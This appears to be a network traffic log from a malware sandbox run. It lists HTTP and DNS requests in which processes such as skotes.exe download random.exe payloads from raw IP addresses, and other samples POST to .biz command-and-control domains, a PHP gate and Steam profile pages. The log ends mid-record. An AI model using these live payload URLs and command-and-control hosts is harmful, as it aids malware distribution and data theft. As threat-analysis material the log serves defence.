                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:16 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 393728
                      Last-Modified: Thu, 12 Dec 2024 07:55:00 GMT
                      Connection: keep-alive
                      ETag: "675a96d4-60200"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/hell911/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/hell911/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2660864
                      Last-Modified: Thu, 12 Dec 2024 23:33:40 GMT
                      Connection: keep-alive
                      ETag: "675b72d4-289a00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://31.41.244.11/files/unique2/random.exe
                      skotes.exe
                      Remote address:
                      31.41.244.11:80
                      Request
                      GET /files/unique2/random.exe HTTP/1.1
                      Host: 31.41.244.11
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:38 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1994240
                      Last-Modified: Fri, 13 Dec 2024 00:01:44 GMT
                      Connection: keep-alive
                      ETag: "675b7968-1e6e00"
                      Accept-Ranges: bytes
                    • flag-us
                      DNS
                      drive-connect.cyou
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      drive-connect.cyou
                      IN A
                      Response
                      drive-connect.cyou
                      IN A
                      172.67.139.78
                      drive-connect.cyou
                      IN A
                      104.21.79.7
                    • flag-us
                      POST
                      https://drive-connect.cyou/api
                      45c3c2bb5b.exe
                      Remote address:
                      172.67.139.78:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: drive-connect.cyou
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=8a4t0mgre7apvskvv9so9bsntu; expires=Mon, 07-Apr-2025 17:53:59 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h8CWn168P3e82XdnH%2F12FJ5VPzOPTFR%2Fq1bn1WKirCO2aW%2B8swfTtytzgtBdJKNGDWcwlhhLdJptX2dD1jZRIWDKoOVCxIcCW%2F0fXnRapXsm8ns4BGzLDv%2F1H6a2fb84qITzgp4%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f11b69d5f014183-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=39832&min_rtt=26344&rtt_var=32243&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2863&recv_bytes=586&delivery_rate=133013&cwnd=252&unsent_bytes=0&cid=4fd11670ede3237d&ts=360&x=0"
                    • flag-us
                      DNS
                      t.me
                      4b025ca5ea.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      t.me
                      IN A
                      Response
                      t.me
                      IN A
                      149.154.167.99
                    • flag-us
                      DNS
                      steamcommunity.com
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      steamcommunity.com
                      IN A
                      Response
                      steamcommunity.com
                      IN A
                      23.214.143.155
                    • flag-gb
                      GET
                      https://steamcommunity.com/profiles/76561199807592927
                      4b025ca5ea.exe
                      Remote address:
                      23.214.143.155:443
                      Request
                      GET /profiles/76561199807592927 HTTP/1.1
                      Host: steamcommunity.com
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                      Cache-Control: no-cache
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Length: 35248
                      Connection: keep-alive
                      Set-Cookie: sessionid=7cb1ab653246d2d58adad597; Path=/; Secure; SameSite=None
                      Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                    • flag-fi
                      GET
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      GET / HTTP/1.1
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----PHVAI5F3EKF37QQQI5XL
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 256
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-us
                      DNS
                      se-blurry.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      se-blurry.biz
                      IN A
                      Response
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----6FCB1VS0ZU37YM79ZUS0
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----VAI58YM7QQ9ZMYCT26FC
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----1VKX4WLNYCBAIMGLF37G
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 300
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-us
                      DNS
                      zinc-sneark.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      zinc-sneark.biz
                      IN A
                      Response
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AS2N7900ZU3EUA1VAI5F
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-fi
                      POST
                      https://95.216.181.44/
                      4b025ca5ea.exe
                      Remote address:
                      95.216.181.44:443
                      Request
                      POST / HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----6XLX4W47GVAAIE3WBIMG
                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                      Host: 95.216.181.44
                      Content-Length: 299
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Date: Fri, 13 Dec 2024 00:07:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                    • flag-ru
                      GET
                      http://185.215.113.16/well/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /well/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:24 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 970240
                      Last-Modified: Thu, 12 Dec 2024 23:07:55 GMT
                      Connection: keep-alive
                      ETag: "675b6ccb-ece00"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.16/steam/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /steam/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1795072
                      Last-Modified: Thu, 12 Dec 2024 23:09:14 GMT
                      Connection: keep-alive
                      ETag: "675b6d1a-1b6400"
                      Accept-Ranges: bytes
                    • flag-ru
                      GET
                      http://185.215.113.16/off/random.exe
                      skotes.exe
                      Remote address:
                      185.215.113.16:80
                      Request
                      GET /off/random.exe HTTP/1.1
                      Host: 185.215.113.16
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 13 Dec 2024 00:07:31 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 2838016
                      Last-Modified: Thu, 12 Dec 2024 23:08:21 GMT
                      Connection: keep-alive
                      ETag: "675b6ce5-2b4e00"
                      Accept-Ranges: bytes
                    • flag-us
                      DNS
                      dwell-exclaim.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dwell-exclaim.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      formy-spill.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      formy-spill.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      covery-mover.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      covery-mover.biz
                      IN A
                      Response
                      covery-mover.biz
                      IN A
                      104.21.58.186
                      covery-mover.biz
                      IN A
                      172.67.206.64
                    • flag-us
                      POST
                      https://covery-mover.biz/api
                      45c3c2bb5b.exe
                      Remote address:
                      104.21.58.186:443
                      Request
                      POST /api HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Content-Length: 8
                      Host: covery-mover.biz
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Set-Cookie: PHPSESSID=kbc0h54668srqs99p2vol4odda; expires=Mon, 07-Apr-2025 17:54:06 GMT; Max-Age=9999999; path=/
                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                      Cache-Control: no-store, no-cache, must-revalidate
                      Pragma: no-cache
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BAGoospFkgNKvYKvkPtiR2S7itHzge8IjItLI0BH26BdMC%2B0pFhvN2ddep2OtYLOf3UxAqhMY%2BUXabjXM9WKr6OaE6q4Rt0ZH8XXHFWfi4%2BhXEnzxWUd%2FxQXDKZuRnzsUWiJ"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8f11b6cd0eb060e8-LHR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=28285&min_rtt=27150&rtt_var=7517&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2859&recv_bytes=584&delivery_rate=129608&cwnd=252&unsent_bytes=0&cid=ede52f6f98c3e128&ts=234&x=0"
                    • flag-us
                      DNS
                      dare-curbys.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dare-curbys.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      dare-curbys.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      dare-curbys.biz
                      IN A
                      Response
                    • flag-ru
                      GET
                      http://185.215.113.206/
                      1206054524.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:30 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-ru
                      POST
                      http://185.215.113.206/c4becf79229cb002.php
                      1206054524.exe
                      Remote address:
                      185.215.113.206:80
                      Request
                      POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----BGIIEGIDHCBFIDHJDGDB
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Response
                      HTTP/1.1 200 OK
                      Date: Fri, 13 Dec 2024 00:07:30 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                    • flag-us
                      DNS
                      print-vexer.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      print-vexer.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • flag-us
                      DNS
                      spocs.getpocket.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      spocs.getpocket.com
                      IN A
                      Response
                      spocs.getpocket.com
                      IN CNAME
                      prod.ads.prod.webservices.mozgcp.net
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • flag-us
                      DNS
                      getpocket.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      getpocket.cdn.mozilla.net
                      IN A
                      Response
                      getpocket.cdn.mozilla.net
                      IN CNAME
                      getpocket-cdn.prod.mozaws.net
                      getpocket-cdn.prod.mozaws.net
                      IN CNAME
                      prod.pocket.prod.cloudops.mozgcp.net
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-fr
                      GET
                      https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                      host: youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-fr
                      GET
                      https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                      firefox.exe
                      Remote address:
                      172.217.18.206:443
                      Request
                      GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                      host: www.youtube.com
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      cookie: YSC=TFrx57vzYjQ
                      upgrade-insecure-requests: 1
                      sec-fetch-dest: document
                      sec-fetch-mode: navigate
                      sec-fetch-site: none
                      sec-fetch-user: ?1
                      te: trailers
                    • flag-us
                      GET
                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                      firefox.exe
                      Remote address:
                      34.120.5.221:443
                      Request
                      GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
                      host: getpocket.cdn.mozilla.net
                      user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                      accept: */*
                      accept-language: en-US,en;q=0.5
                      accept-encoding: gzip, deflate, br
                      sec-fetch-dest: empty
                      sec-fetch-mode: cors
                      sec-fetch-site: cross-site
                      if-none-match: W/"53a0-pN9JStWPWItMnxI0JH+7qixNT6k"
                      te: trailers
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.ads.prod.webservices.mozgcp.net
                      IN A
                      34.117.188.166
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN A
                      Response
                      youtube.com
                      IN A
                      172.217.18.206
                    • flag-us
                      DNS
                      prod.ads.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.ads.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                      Response
                      youtube.com
                      IN AAAA
                      2a00:1450:4007:805::200e
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      youtube.com
                      IN AAAA
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN A
                      34.120.5.221
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN A
                      Response
                      shavar.prod.mozaws.net
                      IN A
                      54.213.181.160
                      shavar.prod.mozaws.net
                      IN A
                      35.85.93.176
                      shavar.prod.mozaws.net
                      IN A
                      44.228.225.150
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      Response
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                      2600:1901:0:524c::
                    • flag-us
                      DNS
                      prod.pocket.prod.cloudops.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.pocket.prod.cloudops.mozgcp.net
                      IN AAAA
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                    • flag-us
                      DNS
                      shavar.prod.mozaws.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      shavar.prod.mozaws.net
                      IN AAAA
                    • flag-us
                      DNS
                      impend-differ.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      impend-differ.biz
                      IN A
                      Response
                    • flag-us
                      DNS
                      impend-differ.biz
                      45c3c2bb5b.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      impend-differ.biz
                      IN A
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                      34.160.144.191
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN A
                    • flag-gb
                      GET
                      https://steamcommunity.com/profiles/76561199724331900
                      45c3c2bb5b.exe
                      Remote address:
                      23.214.143.155:443
                      Request
                      GET /profiles/76561199724331900 HTTP/1.1
                      Connection: Keep-Alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                      Host: steamcommunity.com
                      Response
                      HTTP/1.1 200 OK
                      Server: nginx
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                      Cache-Control: no-cache
                      Date: Fri, 13 Dec 2024 00:07:35 GMT
                      Content-Length: 35598
                      Connection: keep-alive
                      Set-Cookie: sessionid=cf492805cfc5dae4a4940e07; Path=/; Secure; SameSite=None
                      Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                    • flag-us
                      DNS
                      firefox-settings-attachments.cdn.mozilla.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      firefox-settings-attachments.cdn.mozilla.net
                      IN A
                      Response
                      firefox-settings-attachments.cdn.mozilla.net
                      IN CNAME
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.149.100.209
                    • flag-us
                      DNS
                      prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      Response
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN A
                      34.117.121.53
                    • flag-us
                      DNS
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      attachments.prod.remote-settings.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                    • flag-us
                      DNS
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      Response
                      prod.content-signature-chains.prod.webservices.mozgcp.net
                      IN AAAA
                      2600:1901:0:92a9::
                    • flag-us
                      DNS
                      www.youtube.com
                      firefox.exe
                      Remote address:
                      8.8.8.8:53
                      Request
                      www.youtube.com
                      IN A
                      Response
                      www.youtube.com
                      IN CNAME
                      youtube-ui.l.google.com
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.174
                      youtube-ui.l.google.com
                      IN A
                      216.58.215.46
                      youtube-ui.l.google.com
                      IN A
                      172.217.20.174
                      youtube-ui.l.google.com
                      IN A
                      172.217.18.206
                      youtube-ui.l.google.com
                      IN A
                      216.58.214.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.75.238
                      youtube-ui.l.google.com
                      IN A
                      142.250.201.174
                      youtube-ui.l.google.com
                      IN A
                      142.250.179.78
                      youtube-ui.l.google.com
                      IN A
                      142.250.178.142
                      youtube-ui.l.google.com
                      IN A
